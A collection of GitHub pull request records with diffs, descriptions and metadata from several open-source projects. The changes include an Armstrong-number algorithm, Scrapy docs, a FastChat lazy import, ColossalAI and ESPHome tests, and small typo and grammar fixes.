digit_total + + return n == sum - expo = len(str(n)) # power, all number will be raised to - # each digit will be multiplied expo times - temp = [(int(i) ** expo) for i in str(n)] - # check if sum of cube of each digit is equal to number - return n == sum(temp) +def narcissistic_number(n: int) -> bool: + """Return True if n is a narcissistic number or False if it is not. + + >>> all(armstrong_number(n) for n in PASSING) + True + >>> any(armstrong_number(n) for n in FAILING) + False + """ + if not isinstance(n, int) or n < 1: + return False + expo = len(str(n)) # the power that all digits will be raised to + # check if sum of each digit multiplied expo times is equal to number + return n == sum(int(i) ** expo for i in str(n)) def main(): @@ -61,6 +90,7 @@ def main(): num = int(input("Enter an integer to see if it is an Armstrong number: ").strip()) print(f"{num} is {'' if armstrong_number(num) else 'not '}an Armstrong number.") print(f"{num} is {'' if narcissistic_number(num) else 'not '}an Armstrong number.") + print(f"{num} is {'' if pluperfect_number(num) else 'not '}an Armstrong number.") if __name__ == "__main__":
Add a new algorithm to verify whether a number is an Armstrong number (a quick worked example of the property follows the checklist below).

* [x] Add an algorithm?
* [ ] Fix a bug or typo in an existing algorithm?
* [x] Documentation change?

### **Checklist:**
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [ ] All new Python files are placed inside an existing directory.
* [ ] All filenames are in all lowercase characters with no spaces or dashes.
* [x] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [ ] All new algorithms have a URL in their comments that points to Wikipedia or another similar explanation.
* [ ] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
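As a quick illustration of the property being tested (not part of the PR itself): 153 is an Armstrong number because each digit raised to the number of digits sums back to the original number.

```python
n = 153
digits = [int(d) for d in str(n)]
# 1**3 + 5**3 + 3**3 == 153
print(sum(d ** len(digits) for d in digits) == n)  # True
```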
https://api.github.com/repos/TheAlgorithms/Python/pulls/4474
2021-06-02T14:21:04Z
2021-06-04T20:28:26Z
2021-06-04T20:28:26Z
2021-06-05T01:07:13Z
1,082
TheAlgorithms/Python
29,666
[MRG+1] Updated architecture graph for organization/clarity
diff --git a/docs/topics/_images/scrapy_architecture_02.png b/docs/topics/_images/scrapy_architecture_02.png new file mode 100644 index 00000000000..80be02078a1 Binary files /dev/null and b/docs/topics/_images/scrapy_architecture_02.png differ diff --git a/docs/topics/architecture.rst b/docs/topics/architecture.rst index b4588652c5e..ba0e2c61cbc 100644 --- a/docs/topics/architecture.rst +++ b/docs/topics/architecture.rst @@ -16,9 +16,9 @@ components and an outline of the data flow that takes place inside the system below with links for more detailed information about them. The data flow is also described below. -.. image:: _images/scrapy_architecture.png +.. image:: _images/scrapy_architecture_02.png :width: 700 - :height: 494 + :height: 470 :alt: Scrapy architecture Components @@ -99,30 +99,31 @@ Data flow The data flow in Scrapy is controlled by the execution engine, and goes like this: -1. The Engine gets the first URLs to crawl from the Spider and schedules them - in the Scheduler, as Requests. +1. The Engine gets the first URLs to crawl from the Spider. -2. The Engine asks the Scheduler for the next URLs to crawl. +2. The Engine schedules the URLs in the Scheduler as Requests and asks for the + next URLs to crawl. -3. The Scheduler returns the next URLs to crawl to the Engine and the Engine - sends them to the Downloader, passing through the Downloader Middleware - (request direction). +3. The Scheduler returns the next URLs to crawl to the Engine. -4. Once the page finishes downloading the Downloader generates a Response (with +4. The Engine sends the URLs to the Downloader, passing through the + Downloader Middleware (request direction). + +5. Once the page finishes downloading the Downloader generates a Response (with that page) and sends it to the Engine, passing through the Downloader Middleware (response direction). -5. The Engine receives the Response from the Downloader and sends it to the +6. The Engine receives the Response from the Downloader and sends it to the Spider for processing, passing through the Spider Middleware (input direction). -6. The Spider processes the Response and returns scraped items and new Requests - (to follow) to the Engine. +7. The Spider processes the Response and returns scraped items and new Requests + (to follow) to the Engine, passing through the Spider Middleware + (output direction). -7. The Engine passes scraped items and new Requests returned by a spider - through Spider Middleware (output direction), and then sends processed - items to Item Pipelines and processed Requests to the Scheduler. +8. The Engine sends processed items to Item Pipelines and processed Requests to + the Scheduler. -8. The process repeats (from step 1) until there are no more requests from the +9. The process repeats (from step 1) until there are no more requests from the Scheduler. Event-driven networking @@ -143,4 +144,3 @@ links: .. _Introduction to Deferreds in Twisted: https://twistedmatrix.com/documents/current/core/howto/defer-intro.html .. _Twisted - hello, asynchronous programming: http://jessenoller.com/2009/02/11/twisted-hello-asynchronous-programming/ .. _Twisted Introduction - Krondo: http://krondo.com/an-introduction-to-asynchronous-programming-and-twisted/ -
I found the original graph hard to read when first learning about the Scrapy architecture. Open to edits!!
https://api.github.com/repos/scrapy/scrapy/pulls/2165
2016-08-04T17:08:42Z
2016-08-06T01:46:28Z
2016-08-06T01:46:28Z
2016-08-06T01:46:28Z
820
scrapy/scrapy
34,884
Lazy import torch in utils.py
diff --git a/fastchat/utils.py b/fastchat/utils.py index 9dce8bafd4..5680ae1127 100644 --- a/fastchat/utils.py +++ b/fastchat/utils.py @@ -12,7 +12,6 @@ import warnings import requests -import torch from fastchat.constants import LOGDIR @@ -122,6 +121,8 @@ def disable_torch_init(): def get_gpu_memory(max_gpus=None): """Get available memory for each GPU.""" + import torch + gpu_memory = [] num_gpus = ( torch.cuda.device_count() @@ -161,6 +162,8 @@ def clean_flant5_ckpt(ckpt_path): Flan-t5 trained with HF+FSDP saves corrupted weights for shared embeddings, Use this function to make sure it can be correctly loaded. """ + import torch + index_file = os.path.join(ckpt_path, "pytorch_model.bin.index.json") index_json = json.load(open(index_file, "r"))
## Why are these changes needed?

torch is used in the `disable_torch_init`, `get_gpu_memory`, and `clean_flant5_ckpt` functions. However, because it is declared as a top-level import, it is also pulled in as a required dependency, through `build_logger`, into components that should be able to run without `torch`, e.g. the FastChat controller. Using a lazy import at the function level removes this restriction and allows those components to run without `torch` (the pattern is sketched below, after the checklist).

## Related issue number (if applicable)

Closes #2045

## Checks

- [x] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [x] I've made sure the relevant tests are passing (if applicable).
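The change itself is the standard lazy-import pattern, sketched below with a simplified, hypothetical function body (the real functions are in the diff above):

```python
def get_gpu_count() -> int:
    import torch  # deferred: only imported when GPU info is actually requested

    return torch.cuda.device_count()
```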
https://api.github.com/repos/lm-sys/FastChat/pulls/2051
2023-07-22T04:53:27Z
2023-07-22T05:26:52Z
2023-07-22T05:26:52Z
2023-07-22T06:34:54Z
227
lm-sys/FastChat
41,286
Adds minor grammar fixes that involve missing commas.
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index aa155969d..63e9188c2 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -20,7 +20,7 @@ your local changes are appropriate to pull back into the original guidelines, pl [Issue](https://github.com/isocpp/CppCoreGuidelines/issues) which can lead to a pull request. - **Maintain the Guidelines** The C++ Core Guidelines were created from a wealth of knowledge spread across a number of organizations worldwide. If you or your organization is passionate about helping to create the guidelines consider becoming an editor or maintainer. If -you're a C++ expert who is serious about participating please +you're a C++ expert who is serious about participating, please [email coreguidelines@isocpp.org](mailto:coreguidelines@isocpp.org?subject=Maintain the C++ Code Guidelines). ## Contributor License Agreement @@ -28,10 +28,10 @@ By contributing content to the C++ Core Guidelines (i.e., submitting a pull requ [Standard C++ Foundation](https://isocpp.org/about) [Terms of Use](https://isocpp.org/home/terms-of-use), especially all of the terms specified regarding Copyright and Patents. - You warrant that your material is original, or you have the right to contribute it. -- With respect to the material that you own, you grant a worldwide non-exclusive irrevocable transferable royalty-free license to your contributed -material to Standard C++ Foundation to display, reproduce, perform, distribute and create derivative works of that material for commercial or +- With respect to the material that you own, you grant a worldwide, non-exclusive, irrevocable, transferable, and royalty-free license to your contributed +material to Standard C++ Foundation to display, reproduce, perform, distribute, and create derivative works of that material for commercial or non-commercial use. With respect to any other material you contribute, such material must be under a license sufficient to allow Standard C++ Foundation -to display, reproduce, perform, distribute and create derivative works of that material for commercial or non-commercial use. +to display, reproduce, perform, distribute, and create derivative works of that material for commercial or non-commercial use. - You agree that, if your contributed material is subsequently reflected in the ISO/IEC C++ standard in any form, it will be subject to all ISO/IEC JTC 1 policies including [copyrights](http://www.iso.org/iso/home/policies.htm), [patents](http://www.iso.org/iso/home/standards_development/governance_of_technical_work/patents.htm), and
https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/535
2016-02-24T20:08:27Z
2016-03-20T16:36:54Z
2016-03-20T16:36:54Z
2016-03-20T16:36:54Z
590
isocpp/CppCoreGuidelines
15,285
[test] fix shardformer tests
diff --git a/tests/test_shardformer/test_model/test_shard_chatglm2.py b/tests/test_shardformer/test_model/test_shard_chatglm2.py index 29d3592bf34e..78d752b69003 100644 --- a/tests/test_shardformer/test_model/test_shard_chatglm2.py +++ b/tests/test_shardformer/test_model/test_shard_chatglm2.py @@ -11,7 +11,6 @@ build_model_from_hybrid_plugin, check_all_grad_tensors, check_loss, - check_output_hidden_state, check_weight, get_grad_tensors_for_check, run_forward_backward_with_hybrid_plugin, @@ -25,7 +24,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, ) org_loss, org_output, sharded_loss, sharded_output = run_forward_backward_with_hybrid_plugin( - org_model, sharded_model, sharded_optimizer, data_gen_fn, output_transform_fn, criterion, booster + org_model, + sharded_model, + sharded_optimizer, + data_gen_fn, + output_transform_fn, + criterion, + booster, ) stage_manager = booster.plugin.stage_manager @@ -36,7 +41,10 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, shard_chatglm_model = unwrap_model(sharded_model, "ChatGLMModel", "transformer") norm_layer_for_check = ["encoder.layers[0].input_layernorm"] - row_layer_for_check = ["encoder.layers[0].self_attention.query_key_value", "embedding.word_embeddings"] + row_layer_for_check = [ + "encoder.layers[0].self_attention.query_key_value", + "embedding.word_embeddings", + ] col_layer_for_check = ["encoder.layers[0].self_attention.dense"] # Save gradient tensors for comparison between the original model and the sharded model. @@ -94,8 +102,9 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, else: atol, rtol = 5e-3, 5e-3 - if org_model.__class__.__name__ == "ChatGLMModel": - check_output_hidden_state(org_output, sharded_output, stage_manager, atol=atol, rtol=rtol, dim=1) + # TODO: ChatGLMModel output is [S, B, H], merging batch of pipeline is wrong + # if org_model.__class__.__name__ == "ChatGLMModel": + # check_output_hidden_state(org_output, sharded_output, stage_manager, atol=atol, rtol=rtol, dim=1) check_loss(org_loss, sharded_loss, atol=atol, rtol=rtol) @@ -143,8 +152,20 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, "use_lazy_init": False, "precision": "fp32", }, - {"tp_size": 4, "pp_size": 1, "enable_all_optimization": True, "use_lazy_init": False, "precision": "fp32"}, - {"tp_size": 2, "pp_size": 1, "enable_all_optimization": True, "use_lazy_init": False, "precision": "fp32"}, + { + "tp_size": 4, + "pp_size": 1, + "enable_all_optimization": True, + "use_lazy_init": False, + "precision": "fp32", + }, + { + "tp_size": 2, + "pp_size": 1, + "enable_all_optimization": True, + "use_lazy_init": False, + "precision": "fp32", + }, { "tp_size": 2, "pp_size": 1, @@ -159,7 +180,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, def run_chatglm_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_chatglm") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, test_config) clear_layout_converter() @@ -193,7 +220,13 @@ def run_chatglm_test(test_config): def run_chatglm_3d_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_chatglm") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in 
sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, test_config) clear_layout_converter() @@ -202,13 +235,27 @@ def run_chatglm_3d_test(test_config): def check_chatglm(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_chatglm_test() def check_chatglm_3d(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_chatglm_3d_test() diff --git a/tests/test_shardformer/test_model/test_shard_t5.py b/tests/test_shardformer/test_model/test_shard_t5.py index 22c201458ad4..9b22d54d7d31 100644 --- a/tests/test_shardformer/test_model/test_shard_t5.py +++ b/tests/test_shardformer/test_model/test_shard_t5.py @@ -25,7 +25,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, ) org_loss, org_output, sharded_loss, sharded_output = run_forward_backward_with_hybrid_plugin( - org_model, sharded_model, sharded_optimizer, data_gen_fn, output_transform_fn, criterion, booster + org_model, + sharded_model, + sharded_optimizer, + data_gen_fn, + output_transform_fn, + criterion, + booster, ) stage_manager = booster.plugin.stage_manager @@ -71,7 +77,16 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, else: atol, rtol = 5e-3, 5e-3 if stage_manager is None or stage_manager.is_first_stage(): - check_weight(t5, sharded_t5, row_layer_for_check, tp_group, atol=atol, rtol=rtol, dim=0, verbose=False) + check_weight( + t5, + sharded_t5, + row_layer_for_check, + tp_group, + atol=atol, + rtol=rtol, + dim=0, + verbose=False, + ) # check grads check_all_grad_tensors(grads_to_check) @@ -104,7 +119,7 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, { "tp_size": 4, "pp_size": 1, - "enable_all_optimization": True, + "enable_all_optimization": False, "use_lazy_init": False, "precision": "fp32", }, @@ -117,7 +132,6 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, "use_lazy_init": False, "precision": "fp32", }, - {"tp_size": 2, "pp_size": 1, "enable_all_optimization": True, "use_lazy_init": False, "precision": "fp32"}, { "tp_size": 2, "pp_size": 1, @@ -144,7 +158,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, def run_t5_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_t5") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): # skip 4-stage pp test for t5_encoder if test_config["pp_size"] > 2 and name == "transformers_t5_encoder_model": continue @@ -185,7 +205,13 @@ def run_t5_test(test_config): def run_t5_3d_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_t5") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in 
sub_model_zoo.items(): check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, test_config) clear_layout_converter() @@ -194,13 +220,27 @@ def run_t5_3d_test(test_config): def check_t5(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_t5_test() def check_t5_3d(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_t5_3d_test()
## 📌 Checklist before creating the PR

- [ ] I have created an issue for this PR for traceability
- [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [ ] I have added relevant tags if possible for us to better distinguish different PRs

## 🚨 Issue number

> Link this PR to your issue with words like fixed to automatically close the linked issue upon merge
>
> e.g. `fixed #1234`, `closed #1234`, `resolved #1234`

## 📝 What does this PR do?

> Summarize your work here.
> if you have any plots/diagrams/screenshots/tables, please attach them here.

## 💥 Checklist before requesting a review

- [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests.
- [ ] I have added docstrings for all the functions/methods I implemented

## ⭐️ Do you enjoy contributing to Colossal-AI?

- [ ] 🌝 Yes, I do.
- [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/5514
2024-03-26T09:26:45Z
2024-03-27T02:17:17Z
2024-03-27T02:17:17Z
2024-03-27T02:17:20Z
2,510
hpcaitech/ColossalAI
11,443
Add additional coverage for ESPHome sensor and number
diff --git a/.coveragerc b/.coveragerc index 70d9fd5e0e243e..984adba59f74fd 100644 --- a/.coveragerc +++ b/.coveragerc @@ -312,7 +312,6 @@ omit = homeassistant/components/esphome/domain_data.py homeassistant/components/esphome/entry_data.py homeassistant/components/esphome/light.py - homeassistant/components/esphome/number.py homeassistant/components/esphome/switch.py homeassistant/components/etherscan/sensor.py homeassistant/components/eufy/* diff --git a/homeassistant/components/esphome/number.py b/homeassistant/components/esphome/number.py index e876fe412f6e2b..4e3d052e6ef06a 100644 --- a/homeassistant/components/esphome/number.py +++ b/homeassistant/components/esphome/number.py @@ -74,9 +74,7 @@ def _on_static_info_update(self, static_info: EntityInfo) -> None: def native_value(self) -> float | None: """Return the state of the entity.""" state = self._state - if math.isnan(state.state): - return None - if state.missing_state: + if state.missing_state or math.isnan(state.state): return None return state.state diff --git a/tests/components/esphome/test_number.py b/tests/components/esphome/test_number.py new file mode 100644 index 00000000000000..8157c5f5c3d824 --- /dev/null +++ b/tests/components/esphome/test_number.py @@ -0,0 +1,91 @@ +"""Test ESPHome numbers.""" + +import math +from unittest.mock import call + +from aioesphomeapi import ( + APIClient, + NumberInfo, + NumberMode as ESPHomeNumberMode, + NumberState, +) + +from homeassistant.components.number import ( + ATTR_VALUE, + DOMAIN as NUMBER_DOMAIN, + SERVICE_SET_VALUE, +) +from homeassistant.const import ATTR_ENTITY_ID, STATE_UNKNOWN +from homeassistant.core import HomeAssistant + + +async def test_generic_number_entity( + hass: HomeAssistant, + mock_client: APIClient, + mock_generic_device_entry, +) -> None: + """Test a generic number entity.""" + entity_info = [ + NumberInfo( + object_id="mynumber", + key=1, + name="my number", + unique_id="my_number", + max_value=100, + min_value=0, + step=1, + unit_of_measurement="%", + ) + ] + states = [NumberState(key=1, state=50)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("number.test_my_number") + assert state is not None + assert state.state == "50" + + await hass.services.async_call( + NUMBER_DOMAIN, + SERVICE_SET_VALUE, + {ATTR_ENTITY_ID: "number.test_my_number", ATTR_VALUE: 50}, + blocking=True, + ) + mock_client.number_command.assert_has_calls([call(1, 50)]) + mock_client.number_command.reset_mock() + + +async def test_generic_number_nan( + hass: HomeAssistant, + mock_client: APIClient, + mock_generic_device_entry, +) -> None: + """Test a generic number entity with nan state.""" + entity_info = [ + NumberInfo( + object_id="mynumber", + key=1, + name="my number", + unique_id="my_number", + max_value=100, + min_value=0, + step=1, + unit_of_measurement="%", + mode=ESPHomeNumberMode.SLIDER, + ) + ] + states = [NumberState(key=1, state=math.nan)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("number.test_my_number") + assert state is not None + assert state.state == STATE_UNKNOWN diff --git a/tests/components/esphome/test_sensor.py b/tests/components/esphome/test_sensor.py index 5517198341aa36..8f4eb0f95139c8 100644 --- a/tests/components/esphome/test_sensor.py +++ b/tests/components/esphome/test_sensor.py @@ 
-1,6 +1,9 @@ """Test ESPHome sensors.""" +import math + from aioesphomeapi import ( APIClient, + EntityCategory as ESPHomeEntityCategory, LastResetType, SensorInfo, SensorState, @@ -10,8 +13,10 @@ ) from homeassistant.components.sensor import ATTR_STATE_CLASS, SensorStateClass -from homeassistant.const import STATE_UNKNOWN +from homeassistant.const import ATTR_ICON, STATE_UNKNOWN from homeassistant.core import HomeAssistant +from homeassistant.helpers import entity_registry as er +from homeassistant.helpers.entity import EntityCategory async def test_generic_numeric_sensor( @@ -41,6 +46,41 @@ async def test_generic_numeric_sensor( assert state.state == "50" +async def test_generic_numeric_sensor_with_entity_category_and_icon( + hass: HomeAssistant, + mock_client: APIClient, + mock_generic_device_entry, +) -> None: + """Test a generic sensor entity.""" + entity_info = [ + SensorInfo( + object_id="mysensor", + key=1, + name="my sensor", + unique_id="my_sensor", + entity_category=ESPHomeEntityCategory.CONFIG, + icon="mdi:leaf", + ) + ] + states = [SensorState(key=1, state=50)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("sensor.test_my_sensor") + assert state is not None + assert state.state == "50" + assert state.attributes[ATTR_ICON] == "mdi:leaf" + entity_reg = er.async_get(hass) + entry = entity_reg.async_get("sensor.test_my_sensor") + assert entry is not None + assert entry.unique_id == "my_sensor" + assert entry.entity_category is EntityCategory.CONFIG + + async def test_generic_numeric_sensor_state_class_measurement( hass: HomeAssistant, mock_client: APIClient, @@ -70,6 +110,11 @@ async def test_generic_numeric_sensor_state_class_measurement( assert state is not None assert state.state == "50" assert state.attributes[ATTR_STATE_CLASS] == SensorStateClass.MEASUREMENT + entity_reg = er.async_get(hass) + entry = entity_reg.async_get("sensor.test_my_sensor") + assert entry is not None + assert entry.unique_id == "my_sensor" + assert entry.entity_category is None async def test_generic_numeric_sensor_device_class_timestamp( @@ -130,6 +175,56 @@ async def test_generic_numeric_sensor_legacy_last_reset_convert( assert state.attributes[ATTR_STATE_CLASS] == SensorStateClass.TOTAL_INCREASING +async def test_generic_numeric_sensor_no_state( + hass: HomeAssistant, mock_client: APIClient, mock_generic_device_entry +) -> None: + """Test a generic numeric sensor that has no state.""" + entity_info = [ + SensorInfo( + object_id="mysensor", + key=1, + name="my sensor", + unique_id="my_sensor", + ) + ] + states = [] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("sensor.test_my_sensor") + assert state is not None + assert state.state == STATE_UNKNOWN + + +async def test_generic_numeric_sensor_nan_state( + hass: HomeAssistant, mock_client: APIClient, mock_generic_device_entry +) -> None: + """Test a generic numeric sensor that has nan state.""" + entity_info = [ + SensorInfo( + object_id="mysensor", + key=1, + name="my sensor", + unique_id="my_sensor", + ) + ] + states = [SensorState(key=1, state=math.nan, missing_state=False)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = 
hass.states.get("sensor.test_my_sensor") + assert state is not None + assert state.state == STATE_UNKNOWN + + async def test_generic_numeric_sensor_missing_state( hass: HomeAssistant, mock_client: APIClient, mock_generic_device_entry ) -> None:
## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> Add additional coverage for ESPHome `entity.py` via `sensor/number` ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [ ] Dependency upgrade - [ ] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Deprecation (breaking change to happen in the future) - [ ] Breaking change (fix/feature causing existing functionality to break) - [x] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [ ] Local tests pass. **Your PR cannot be merged unless tests pass** - [ ] There is no commented out code in this PR. - [ ] I have followed the [development checklist][dev-checklist] - [ ] I have followed the [perfect PR recommendations][perfect-pr] - [ ] The code has been formatted using Black (`black --fast homeassistant tests`) - [x] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. 
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/ [manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/ [quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/ [docs-repository]: https://github.com/home-assistant/home-assistant.io [perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
https://api.github.com/repos/home-assistant/core/pulls/95226
2023-06-26T03:48:09Z
2023-06-26T10:29:38Z
2023-06-26T10:29:38Z
2023-06-27T11:18:26Z
2,084
home-assistant/core
38,772
Add m3u8
diff --git a/README.md b/README.md index 0127fa65b..15d34a33b 100644 --- a/README.md +++ b/README.md @@ -286,6 +286,7 @@ A curated list of awesome Python frameworks, libraries and software. Inspired by * [talkbox](http://scikits.appspot.com/talkbox) - A Python library for speech/signal processing. * [TimeSide](https://github.com/yomguy/TimeSide) - Open web audio processing framework. * [tinytag](https://github.com/devsnd/tinytag) - A library for reading music meta data of MP3, OGG, FLAC and Wave files. +* [m3u8](https://github.com/globocom/m3u8) - A module for parsing m3u8 file. ## Video
Add m3u8 to the Audio Section
https://api.github.com/repos/vinta/awesome-python/pulls/188
2014-08-09T03:31:29Z
2014-08-09T07:19:39Z
2014-08-09T07:19:39Z
2014-08-09T07:19:39Z
187
vinta/awesome-python
27,267
[iqiyi] Correct a typo in iqiyi.py
diff --git a/youtube_dl/extractor/iqiyi.py b/youtube_dl/extractor/iqiyi.py index cd11aa70f01..5df674daf14 100644 --- a/youtube_dl/extractor/iqiyi.py +++ b/youtube_dl/extractor/iqiyi.py @@ -150,7 +150,7 @@ def run(self, target, ip, timestamp): elif function in other_functions: other_functions[function]() else: - raise ExtractorError('Unknown funcion %s' % function) + raise ExtractorError('Unknown function %s' % function) return sdk.target
## Please follow the guide below - You will be asked some questions, please read them **carefully** and answer honestly - Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x]) - Use *Preview* tab to see how your *pull request* will actually look like --- ### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [adding new extractor tutorial](https://github.com/ytdl-org/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/ytdl-org/youtube-dl#youtube-dl-coding-conventions) sections - [x] [Searched](https://github.com/ytdl-org/youtube-dl/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) ### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options: - [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) - [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence) ### What is the purpose of your *pull request*? - [ ] Bug fix - [x] Improvement - [ ] New extractor - [ ] New feature --- ### Description of your *pull request* and other information Correct a simple typo.
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/26884
2020-10-14T15:07:16Z
2020-10-17T16:02:18Z
2020-10-17T16:02:17Z
2020-10-17T20:09:35Z
142
ytdl-org/youtube-dl
49,918
Adding naive-apl
